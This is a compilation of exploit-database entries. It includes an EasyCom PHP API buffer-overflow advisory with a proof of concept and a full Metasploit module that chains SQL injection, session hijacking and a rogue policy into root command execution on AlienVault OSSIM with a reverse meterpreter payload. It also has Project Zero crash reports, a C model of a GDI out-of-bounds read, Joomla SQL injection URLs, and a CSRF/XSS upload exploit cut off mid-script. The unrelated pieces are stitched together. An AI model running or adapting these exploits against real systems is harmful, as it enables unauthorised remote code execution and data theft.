February 22, 2017 : Public Disclosure
Network Access:
===============
Remote
Severity:
===========
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========================
EASYCOM AS400 (iBMI) PHP API
EasycomPHP_4.0029.iC8im2.exe
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
Windows, Linux, and IBMi.
The EasyCom build tested here requires an older version of PHP.
Setup test environment:
Windows 7
XAMPP 1.7.3
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0
PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
Vulnerability Type:
=========================
API Stack Buffer Overflow
CVE Reference:
==============
CVE-2017-5358
Security Issue:
================
EasyCom PHP API suffers from multiple buffer overflow entry points, which can result in arbitrary code execution on the affected system.
Below I provide some proof of concept details for a few of them.
EAX 00000000
ECX 41414141
EDX 771D6ACD ntdll.771D6ACD
EBX 00000000
ESP 00C0F238
EBP 00C0F258
ESI 00000000
EDI 00000000
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
SEH chain of main thread
Address SE handler
00C0F354 kernel32.7600410E
00C0FF78 42424242
52525252 *** CORRUPT ENTRY ***
WinDbg dump...
(720.a70): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:000> !load winext/msec
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
User mode DEP access violations are exploitable.
PHP Crash:
=============
Problem signature:
Problem Event Name: BEX
Application Name: php.exe
Application Version: 5.3.1.0
Application Timestamp: 4b06c430
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Offset: 41414141
Exception Code: c0000005
Exception Data: 00000008
OS Version: 6.1.7601.2.1.0.256.48
Exploit/POC:
===============
php_Easycom5_3_0.dll 0day vuln POC minus the exploit; I'm bored, going to the park.
<?php
/* Basic connection to an AS400 iBMI System */
$payload=str_repeat("A", 4000); #BOOM!
$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100); #SEH
$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg()); #VULN
$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() ); #VULN
$conn = i5_private_connect($payload, $user, $password, array()); #VULN
echo 'EasyCom PHP API 0day ' . $conn;
?>
Network Access:
===============
Remote
Severity:
==========
High
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AlienVault OSSIM/USM Remote Code Execution",
      'Description'    => %q{
        This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together.
        Unauthenticated users can execute arbitrary commands under the context of the root user.

        By abusing the authentication bypass issue on gauge.php, adversaries can exploit an object injection vulnerability
        which leads to a SQL injection attack that leaks an administrator session token. Attackers can create a rogue
        action and policy that enables them to execute operating system commands by using the captured session token. As a final step,
        an SSH login attempt with invalid credentials can trigger the created rogue policy, which triggers an action that executes
        an operating system command with root user privileges.

        This module was tested against the following products and versions:
        AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
        AlienVault OSSIM 5.0.0, 4.6.1
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Lapp', # EDB advisory owner
          'Mehmet Ince <mehmet@mehmetince.net>' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
          ['EDB', '40682']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'WfsDelay' => 10,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        =>
        [
          ['Alienvault USM/OSSIM <= 5.3.0', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Jan 31 2017",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
      ], self.class)
  end

  def check
    r = rand_text_alpha(15)
    p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
      'headers' => {
        'User-Agent' => 'AV Report Scheduler',
      },
      'vars_get' => {
        'type' => 'alarm',
        'wtype' => 'foo',
        'asset' => 'ALL_ASSETS',
        'height' => 1,
        'value' => p
      }
    })

    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Hijacking the administrator session by exploiting the object injection vuln that ends up as SQLi
    print_status("Hijacking administrator session")

    sql = "SELECT id FROM sessions LIMIT 1"
    p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
        'User-Agent' => 'AV Report Scheduler',
      },
      'vars_get' => {
        'type' => 'alarm',
        'wtype' => 'foo',
        'asset' => 'ALL_ASSETS',
        'height' => 1,
        'value' => p
      }
    })

    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
      admin_session = $1
      cookie = "PHPSESSID=#{admin_session}"
      print_good("Admin session token : #{cookie}")
    else
      fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
    end

    # Creating an Action that contains the payload.
    print_status("Creating rogue action")

    r = rand_text_alpha(15)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_post' => {
        'id' => '',
        'action' => 'new',
        'old_name' => '',
        'action_name' => r,
        'ctx' => '',
        'old_descr' => '',
        'descr' => r,
        'action_type' => '2',
        'only' => 'on',
        'cond' => 'True',
        'email_from' => '',
        'email_to' => 'email;email;email',
        'email_subject' => '',
        'email_message' => '',
        'transferred_user' => '',
        'transferred_entity' => '',
        'exec_command' => "python -c \"#{payload.encoded}\""
      }
    })

    if res && res.code == 200 && res.body.include?("Action successfully updated")
      print_good("Action created: #{r}")
    else
      fail_with(Failure::Unknown, "Unable to create action")
    end

    # Retrieving the action id. The authentication bypass with User-Agent doesn't work for this endpoint.
    # Thus we're using the hijacked administrator session.
    print_status("Retrieving rogue action id")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_get' => {
        'page' => '1',
        'rp' => '2000'
      }
    })

    if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
      action_id = $1
      print_good("Corresponding Action ID found: #{action_id}")
    else
      fail_with(Failure::Unknown, "Unable to retrieve action id")
    end

    # Retrieving the policy data. We will use it while creating the policy
    print_status("Retrieving policy ctx and group values")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_get' => {
        'm_opt' => 'configuration',
        'sm_opt' => 'threat_intelligence',
        'h_opt' => 'policy'
      }
    })

    if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
      policy_ctx = $1
      policy_group = $2
      print_good("CTX Value found: #{policy_ctx}")
      print_good("GROUP Value found: #{policy_group}")
    else
      fail_with(Failure::Unknown, "Unable to retrieve policy data")
    end

    # Creating a policy that will be triggered when SSH authentication fails due to a wrong password.
    print_status("Creating a policy that uses our rogue action")

    policy = rand_text_alpha(15)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_post' => {
        'descr' => policy,
        'active' => '1',
        'group' => policy_group,
        'ctx' => policy_ctx,
        'order' => '1',
        'action' => 'new',
        'sources[]' => '00000000000000000000000000000000',
        'dests[]' => '00000000000000000000000000000000',
        'portsrc[]' => '0',
        'portdst[]' => '0',
        'plug_type' => '1',
        'plugins[0]' => 'on',
        'taxfilters[]' => '25@2@0',
        'tax_pt' => '0',
        'tax_cat' => '0',
        'tax_subc' => '0',
        'mboxs[]' => '00000000000000000000000000000000',
        'rep_act' => '0',
        'rep_sev' => '1',
        'rep_rel' => '1',
        'rep_dir' => '0',
        'ev_sev' => '1',
        'ev_rel' => '1',
        'tzone' => 'Europe/Istanbul',
        'date_type' => '1',
        'begin_hour' => '0',
        'begin_minute' => '0',
        'begin_day_week' => '1',
        'begin_day_month' => '1',
        'begin_month' => '1',
        'end_hour' => '23',
        'end_minute' => '59',
        'end_day_week' => '7',
        'end_day_month' => '31',
        'end_month' => '12',
        'actions[]' => action_id,
        'sim' => '1',
        'priority' => '1',
        'qualify' => '1',
        'correlate' => '0',
'cross_correlate' => '0',
'store' => '0'
}
})
if res && res.code == 200
print_good("Policy created: #{policy}")
else
fail_with(Failure::Unknown, "Unable to create policy id")
end
# We gotta reload all policies in order to make our rogue one enabled.
print_status("Activating the policy")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_good("Rogue policy activated")
else
fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
end
# We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
factory = ssh_socket_factory
opts = {
auth_methods: ['password'],
port: 22,
use_agent: false,
config: false,
password: rand_text_alpha(15),
proxy: factory,
non_interactive: true
}
print_status("Triggering the policy by performing SSH login attempt")
begin
Net::SSH.start(rhost, "root", opts)
rescue Net::SSH::AuthenticationFailed
print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
rescue Net::SSH::Exception => e
print_error("SSH Error: #{e.class} : #{e.message}")
return nil
end
end
end
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
The attached FLV file causes a heap overflow in YUVPlane decoding.
To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41423.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
The attached swf causes a use-after-free in applying bitmap filters.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41422.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1013
The attached fuzzed swf causes stack corruption when it is loaded, likely due to the parsing of the SWF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41421.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1018
There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on a server and visit http://127.0.0.1/LoadMP4.swf?file=unsigned.mp4.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41420.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=951
Platform: GDI on Windows 7 x86 reachable from Microsoft Office 2010
Class: Out of bounds memory access
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled.
Attached files:
2167705722.ppt: fuzzed crashing file
File versions:
gdi32.dll: 6.1.7601.23457
gdiplus.dll: 6.1.7601.23508
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
(788.ca0): Access violation - code c0000005 (first chance)
eax=00000000 ebx=0747bc5c ecx=00000001 edx=16ab9fd8 esi=1c45dcb8 edi=223e3000
eip=77667a68 esp=1c45dc78 ebp=1c45dc84 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
GDI32!ConvertDxArray+0x3c:
77667a68 8b07 mov eax,dword ptr [edi] ds:0023:223e3000=????????
0:014> kb
ChildEBP RetAddr Args to Child
1c45dc84 7765a2b3 000003a8 0747bc5c 223e2ff0 GDI32!ConvertDxArray+0x3c
1c45e6dc 776442e7 1f210a94 0000001b 00000093 GDI32!MF_ExtTextOut+0x3b4
1c45ec48 776405dc 1f210a94 0000001b 00000093 GDI32!ExtTextOutInternalA+0x156
1c45ec74 7764969c 1f210a94 0000001b 00000093 GDI32!ExtTextOutA+0x24
1c45ed5c 7764e40f 1f210a94 0ab42fc8 0747bc42 GDI32!PlayMetaFileRecord+0x1bc7
1c45ede0 7764e441 21464dc0 0000000c 00000000 GDI32!CommonEnumMetaFile+0x24d
1c45edf8 741fb1c0 1f210a94 2a260a92 7764438a GDI32!PlayMetaFile+0x1f
1c45ee60 741fb65b 2a260a92 43b405d9 46123597 GdiPlus!GetEmfFromWmfData+0x420
1c45ee84 741fb768 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::InitWmf+0xb2
1c45eea0 741fea9f 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::GpMetafile+0x3b
1c45eef8 741ff642 19a0cd28 1c45efbc 00000000 GdiPlus!GpMetafile::ConvertToEmfPlus+0x79
1c45ef1c 741d4fc2 19a0cd28 1c45efbc 00000004 GdiPlus!GpMetafile::ConvertToEmfPlus+0x1d
1c45ef58 6b388b58 19a0cd28 1999ef28 1c45efbc GdiPlus!GdipConvertToEmfPlus+0xbf
1c45efd4 6b36f2f4 19a0cd28 00000000 1fd76f56 gfx!Ordinal841+0x12250
1c45f004 678980c2 1c45f07c 1c45f024 1fd75519 gfx!Ordinal745+0x34
1c45f090 67897d68 1c45f0e8 07430f28 21408fe0 oart!Ordinal7931+0x6d0
1c45f104 677e340d 07430f28 1c45f124 67805b69 oart!Ordinal7931+0x376
1c45f110 67805b69 1c45f2c8 1c45f1b0 6b24cceb oart!Ordinal3235+0x14a
The function GDI32!ConvertDxArray is called with codepage 936 (ANSI/OEM Simplified Chinese [PRC, Singapore]; Chinese Simplified [GB2312]), a length of 4 (DWORDs), and source contents of 0x00000010 0x00000000 0x00000010 0x00000000. There are two paths in this function: one that operates on 4-byte boundaries and one that operates on 8-byte boundaries, depending on the last argument, where true indicates an 8-byte boundary and false indicates a 4-byte boundary. Both paths have the same issue. Pseudocode for one path in the function is:
...
else if ( (unsigned int)current < result )
{
  cur_dest = (unsigned int *)dest;
  cur_src = (unsigned int *)src;
  do
  {
    dbcs_ret = IsDBCSLeadByteEx(CodePage, *current++);
    dbcs_flag = dbcs_ret == 0;
    tmp = *cur_src;
    *cur_dest = tmp;
    if ( !dbcs_flag )       // lead byte: a second source DWORD is consumed
    {
      ++cur_src;
      tmp = *cur_src;       // crash here
      ++current;
      *cur_dest += tmp;
    }
    ++cur_src;
    ++cur_dest;
  }
  while ( (unsigned int)current < end );
}
The issue here is that when dbcs_flag is false the 4 byte boundary version can actually process 8 bytes of the source buffer (cur_src is incremented twice) and the 8 byte version is capable of processing 16 bytes per iteration. The length checks in this function do not verify this behavior to be in bounds. However, the most likely exploitation scenario will be a memory disclosure because cur_dest is not written to out of bounds. The value in tmp is instead added to the contents of cur_dest.
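The loop above, as an added C model that is not the Project Zero or Microsoft code: it counts the source DWORDs the unchecked 4-byte path touches for a given string, and places a bounds-checked version beside it. The lead-byte range 0x81..0xFE is a simplified stand-in for IsDBCSLeadByteEx(936, c), and the input string, dx array and function names are constructed for the demo. The crash record's 4-DWORD dx array is used, with a string whose last byte is a lead byte, so the unchecked loop reads a fifth DWORD while the checked version stays in bounds.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Simplified stand-in for IsDBCSLeadByteEx(936, c): in GB2312 (code page 936)
 * the lead bytes are 0x81..0xFE. Assumption for this demo, not the Win32 API. */
static bool is_dbcs_lead_byte_cp936(uint8_t c)
{
    return c >= 0x81 && c <= 0xFE;
}

/* Counts how many source DWORDs the unchecked loop touches for this string.
 * After a lead byte it always reads a second DWORD, even when the lead byte is
 * the last byte of the string, so the count can exceed the string length (and
 * the dx array sized for it) by one. Only the bound on `current` is checked. */
size_t dx_reads_unchecked(const uint8_t *str, size_t str_len)
{
    size_t reads = 0;
    for (size_t i = 0; i < str_len; ) {
        reads++;                              /* tmp = *cur_src            */
        if (is_dbcs_lead_byte_cp936(str[i])) {
            reads++;                          /* tmp = *++cur_src (unchecked) */
            i += 2;                           /* ++current twice           */
        } else {
            i += 1;
        }
    }
    return reads;
}

/* Hardened version: every source read is bounds-checked against src_count and
 * a lead byte with no trailing byte is treated as a single-byte character.
 * Returns the number of dest entries written, or -1 when src/dest is too short. */
int convert_dx_checked(const uint8_t *str, size_t str_len,
                       const uint32_t *src, size_t src_count,
                       uint32_t *dest, size_t dest_count)
{
    size_t s = 0, d = 0;
    for (size_t i = 0; i < str_len; ) {
        if (s >= src_count || d >= dest_count)
            return -1;
        uint32_t width = src[s++];
        if (is_dbcs_lead_byte_cp936(str[i]) && i + 1 < str_len) {
            if (s >= src_count)               /* the check the original lacks */
                return -1;
            width += src[s++];                /* *cur_dest += tmp          */
            i += 2;
        } else {
            i += 1;
        }
        dest[d++] = width;
    }
    return (int)d;
}

/* Constructed inputs: a 4-DWORD dx array as in the crash record, and a string
 * whose last byte (0xB0) is a lead byte with no trail byte. */
static const uint8_t  k_str[] = { 'A', 'B', 'C', 0xB0 };
static const uint32_t k_src[] = { 0x10, 0x00, 0x10, 0x00 };

/* Unchecked loop: 5 reads from a 4-DWORD array (one DWORD out of bounds). */
size_t demo_unchecked_reads(void) { return dx_reads_unchecked(k_str, 4); }

/* Checked loop on the same input: 4 entries written, nothing read past src. */
int demo_checked_full(void)
{
    uint32_t dest[4];
    return convert_dx_checked(k_str, 4, k_src, 4, dest, 4);
}

/* Checked loop with a dx array one DWORD too short: rejected with -1. */
int demo_checked_short_src(void)
{
    uint32_t dest[4];
    return convert_dx_checked(k_str, 4, k_src, 3, dest, 4);
}

/* A complete lead/trail pair (0xB0 0xA1) sums its two source DWORDs: 8 + 8. */
uint32_t demo_checked_pair_width(void)
{
    const uint8_t  str[] = { 0xB0, 0xA1, 'A' };
    const uint32_t src[] = { 0x08, 0x08, 0x10 };
    uint32_t dest[3];
    if (convert_dx_checked(str, 3, src, 3, dest, 3) != 2)
        return 0;
    return dest[0];
}

int main(void)
{
    printf("unchecked reads: %zu (array has 4)\n", demo_unchecked_reads());
    printf("checked, full src: %d entries\n", demo_checked_full());
    printf("checked, short src: %d\n", demo_checked_short_src());
    printf("checked, DBCS pair width: 0x%x\n", demo_checked_pair_width());
    return 0;
}
```

The count in dx_reads_unchecked is the observable form of the defect: the only loop bound is on `current`, so the extra `++cur_src` inside the lead-byte branch is never compared against the end of the dx array, and a trailing lead byte walks one DWORD past it. The same reasoning applies to the 8-byte path, where each step consumes two DWORDs per character.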
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41419.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=950
Platform: Microsoft Office 2010 on Windows 7 x86
Class: Time of check time of use leading to memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash is non-deterministic and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
Attached files:
910494862.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
oart.dll: 14.0.7169.5000
ppcore.dll: 14.0.7173.5000
(510.66c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1a6f0fb0 ebx=3c782fc4 ecx=1a53cfe0 edx=000004bf esi=1a53cfe0 edi=1a4d6fc0
eip=66acdf93 esp=0013d8b0 ebp=0013d8bc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
mso!Ordinal4899+0xd33:
66acdf93 f6465804 test byte ptr [esi+58h],4 ds:0023:1a53d038=??
0:000> uf 0x66acdf8b
mso!Ordinal4899+0xd2b:
66acdf8b 55 push ebp
66acdf8c 8bec mov ebp,esp
66acdf8e 51 push ecx
66acdf8f 51 push ecx
66acdf90 56 push esi
66acdf91 8bf1 mov esi,ecx
=> 66acdf93 f6465804 test byte ptr [esi+58h],4
Call Stack:
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013d8bc 66ba7720 00000000 1a9d6f98 66ad3d33 mso!Ordinal4899+0xd33
0013d948 67908f0d 1a996e30 1a9d6f98 0000001a mso!Ordinal4720+0x201
0013d980 67906400 0013d9fc 679063f4 0013d9fc oart!Ordinal7979+0x35
0013d994 67908f30 2cccaf58 0013d9fc 0013d9cc oart!Ordinal2490+0x10b
0013d9a4 677e2a14 0013d9fc 1a4d6fd8 1a984ff0 oart!Ordinal7979+0x58
0013d9cc 677e2999 1a4d6ff0 0013d9fc 0013da0c oart!Ordinal6+0xc4
0013d9dc 6788730f 0013d9fc 3a5fe1a5 1a554f8c oart!Ordinal6+0x49
0013da0c 68c8e465 3c782fc4 3a5ff871 68b7e504 oart!Ordinal1989+0xaa
0013da44 68c985dd 3a5fc635 0013e4b4 68b8661c ppcore!PPMain+0x9130c
0013e400 68d0540f 00000000 3c886ea0 00000001 ppcore!PPMain+0x9b484
In this crash the pointer being dereferenced in esi is being tested for a flag value. However, the pointer is referencing invalid memory, generating an access violation. The esi value came from the ecx register, which is presumably the this pointer. The previous chunk at esi-0x58 is valid memory, but 0x58 is beyond the allocated size of that chunk:
0:000> !heap -p -a 19841038
address 19841038 found in
_DPH_HEAP_ROOT @ 11a1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
197f1d9c: 19840fe0 20 - 19840000 2000
70588e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
778c616e ntdll!RtlDebugAllocateHeap+0x00000030
7788a08b ntdll!RtlpAllocateHeap+0x000000c4
77855920 ntdll!RtlAllocateHeap+0x0000023a
710ead1a vrfcore!VerifierSetAPIClassName+0x000000aa
6d7b16ac vfbasics+0x000116ac
60b20233 mso!Ordinal9052+0x0000713f
67808744 oart!Ordinal2033+0x00000090
678086ab oart!Ordinal6561+0x000000ac
6781af9f oart!Ordinal5870+0x00000060
Looking at the calling function:
0:000> uf 0x66ba76ef
mso!Ordinal4720+0x1d0:
66ba76ef 56 push esi
66ba76f0 8bf1 mov esi,ecx
66ba76f2 e8a7ddfaff call mso!Ordinal8038+0x461 (66b5549e) ; first call
66ba76f7 85c0 test eax,eax
66ba76f9 7427 je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1dc:
66ba76fb 8bce mov ecx,esi
66ba76fd e89cddfaff call mso!Ordinal8038+0x461 (66b5549e) ; second call
66ba7702 83781400 cmp dword ptr [eax+14h],0
66ba7706 741a je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1e9:
66ba7708 8bce mov ecx,esi
66ba770a e88fddfaff call mso!Ordinal8038+0x461 (66b5549e) ; third call
66ba770f 8b4014 mov eax,dword ptr [eax+14h]
66ba7712 8b4810 mov ecx,dword ptr [eax+10h] ; crashing ecx value
66ba7715 85c9 test ecx,ecx
66ba7717 7413 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x1fa:
66ba7719 6a00 push 0
66ba771b e86b68f2ff call mso!Ordinal4899+0xd2b (66acdf8b) ; crashing function
66ba7720 5e pop esi
66ba7721 c3 ret
mso!Ordinal4720+0x203:
66ba7722 f6465804 test byte ptr [esi+58h],4 ; same check as crashing function
66ba7726 7404 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x209:
66ba7728 8bce mov ecx,esi
66ba772a ebed jmp mso!Ordinal4720+0x1fa (66ba7719)
mso!Ordinal4720+0x20d:
66ba772c b8ff0f0000 mov eax,0FFFh
66ba7731 5e pop esi
66ba7732 c3 ret
Looking at the logic flow of this function, we see that the very first call to mso!Ordinal8038+0x461 must return a non-null value, or else the same check as in the crashing function is performed in the calling function. With a non-null return, this same function is called again, only this time the value at [eax+0x14h] is checked to be non-null. If this second check passes, we call the same function a third time! This time we follow the pointer at [[eax+0x14]+0x10] and check it to be non-null before passing it to the crashing function. Given the repeated calls to the same function and the non-determinism of the bug, I suspect this is a time of check time of use bug on the object implementing these methods.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41418.zip
# # # # #
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_osservicesbooking
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
# Demo: http://osb.ext4joomla.com/
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
# Etc..
# # # # #
# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to Persistent XSS and RCE Through Unrestricted File Upload
# Date: 30 August 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
# Version: 1.0.1 to 3.0.3
----------------------------------------------------------------------------------------------------------------------
RSS News AutoPilot Script File:
http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
Description:
An attacker is able to execute JS and PHP code on a web application using RSS News - AutoPilot Script, which allows the attacker to create a post when an authenticated user/admin browses a specially crafted web page. The whole process was also possible without any authenticated user/admin; for more info, watch the PoC video below.
The title parameter was not filtering special characters, meaning it is vulnerable to XSS, and while uploading an image the file type was not checked, meaning it is vulnerable to unrestricted file upload. So, by creating CSRF exploit code that posts an article with an XSS alert JS payload as the post title and a PHP file as the image, if the attacker performs the CSRF attack successfully then the XSS will be triggered and PHP code can be executed too.
PoC Video: https://youtu.be/znDgv8K0yFk
CSRF Exploit Code:
<html>
<body>
<title>[RSS News - AutoPilot Script] CSRF to Persistent XSS and RCE</title>
<script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://localhost/news.php?case=add", true);
